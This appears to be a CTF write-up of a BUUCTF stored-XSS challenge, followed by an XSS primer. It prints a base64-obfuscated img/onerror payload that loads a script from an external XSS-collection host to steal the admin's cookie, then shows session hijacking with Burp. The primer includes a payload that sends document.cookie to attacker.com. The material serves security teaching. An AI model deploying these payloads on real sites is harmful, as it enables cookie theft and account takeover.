1.【BUUCTF】BUU XSS COURSE 11及XSS知识点

进入题目页面如下,有吐槽和登录两个可注入点

根据题目可知是一道XSS

登陆界面没有注册,尝试简单的SQL注入也不行

回到吐槽界面,输入简单的xss代码

<script>alert(1)</script>

访问网址,发现回显不出来,猜测是存储型xss,通过吐槽功能插入xss代码,获取cookie登录后台

可以使用下面这个平台,创建项目
XSS安全平台

在平台创建项目

下一步时选择这个,再滑到最下面点击下一步就创建成功了

在跳转的页面在给出了很多语句,选择其中一个复制

'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvM2c3Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>

在吐槽处粘贴,并提交,提示成功

访问它所给的url,因为靶机过期了,这里更换了靶机所以url不一样哈

在xss平台查看cookie值,接收到了两个内容,其中第二个是管理员内容,查看cookie值

获取到了 cookie :

PHPSESSID=b699f6cfc0171e76519d53e0cdde912f

访问后台路径

http://web/backend/admin.php

根据提示构造url并访问

http://6d8981fb-8b3b-41f5-8332-1acf3cd56aff.node5.buuoj.cn:81/backend/admin.php

还没改cookie qyq

在burp suite中抓包,修改cookie值并放行

点击放行,最终得到flag


XSS知识点

跨站脚本攻击(简称 XSS)是一种常见的 Web 安全漏洞,可以通过注入恶意脚本到网页中,当用户访问该页面时,脚本会在用户的浏览器中执行,从而获取用户的敏感信息或执行其他恶意操作。

XSS 攻击类型

反射型 XSS

原理:攻击者构造包含恶意脚本的 URL,诱导用户点击。服务器接收到请求后,将恶意脚本作为响应的一部分返回给浏览器,浏览器会执行该脚本。

示例:搜索页面中,如果搜索关键词直接显示在页面上,攻击者可以构造包含恶意脚本的搜索关键词,如 <script>alert('XSS')</script>,当用户点击包含该关键词的链接时,服务器返回的页面会执行该脚本弹出提示框。

存储型 XSS

原理:攻击者将恶意脚本提交到网站的数据库中,当其他用户访问包含该恶意脚本的页面时,浏览器会执行该脚本。

示例:在论坛的留言板中,攻击者提交一条包含恶意脚本的留言,如 <script>document.location='http://attacker.com?cookie='+document.cookie\</script>。当其他用户查看该留言时,脚本会将用户的 cookie 信息发送到攻击者的服务器。

DOM 型XSS

原理:基于 DOM(文档对象模型)的 XSS 攻击不依赖于服务器端的响应,而是通过修改页面的 DOM 结构来注入恶意脚本。攻击者通过构造特定的 URL 或表单数据,使浏览器在处理页面时动态地将恶意脚本插入到 DOM 中并执行。

示例:页面中有一个 JavaScript 代码根据 URL 参数修改页面内容,如 document.getElementById('content').innerHTML = location.hash.substr(1);,攻击者可以构造包含恶意脚本的 URL,如 http://example.com/#\<script>alert('XSS')</script>,当用户访问该 URL 时,浏览器会执行脚本。

XSS 攻击危害

窃取用户信息:攻击者可以通过 XSS 脚本获取用户的 cookie、会话令牌等敏感信息,从而假冒用户身份登录网站,进行各种操作。

篡改页面内容:攻击者可以修改页面的显示内容,误导用户,如修改登录表单的提交地址,将用户输入的账号密码发送到攻击者的服务器。

执行恶意操作:在用户的浏览器中执行恶意代码,如安装恶意软件、发起 DDoS 攻击等。

XSS 攻击的注入点

URL 参数:很多 Web 应用会根据 URL 参数动态生成页面内容,攻击者可以在 URL 参数中注入恶意脚本。

表单输入:用户在表单中输入的内容如果没有经过严格过滤和验证,可能会被作为恶意脚本注入到页面中。

HTTP 头部:某些情况下,HTTP 头部信息也可能被用于 XSS 攻击,如 Referer 头部。

检测 XSS 漏洞

手动测试:通过构造包含常见 XSS 测试代码的输入,如 <script>alert('XSS')</script>、<img src=x onerror=alert('XSS')> 等,观察页面是否执行了这些脚本。

自动化工具:使用专业的安全扫描工具,如 OWASP ZAP、Nessus 等,对网站进行全面扫描,检测是否存在 XSS 漏洞。

相关推荐
网络安全King7 分钟前
Web安全|渗透测试|网络安全
安全·web安全
AIQL38 分钟前
智能化转型2.0:从“工具应用”到“价值重构”
网络·人工智能·ai·创业创新
华为云PaaS服务小智1 小时前
开源安全一站式构建!开启企业开源治理新篇章
安全·开源·华为云
Adler学安全1 小时前
CS 与 BS 架构的差异
网络
dal118网工任子仪3 小时前
102,【2】buuctf web [第二章 web进阶]XSS闯关
前端·xss
dal118网工任子仪3 小时前
101,【1】buuctf web BUU XSS COURSE 1
前端·xss
doubt。3 小时前
3.【BUUCTF】XSS-Lab1
网络·安全·web安全·网络安全·xss
zhangzhangkeji3 小时前
(9) 上:学习与验证 linux 里的 epoll 对象里的 EPOLLIN、 EPOLLHUP 与 EPOLLRDHUP 的不同
linux·网络·epoll 标志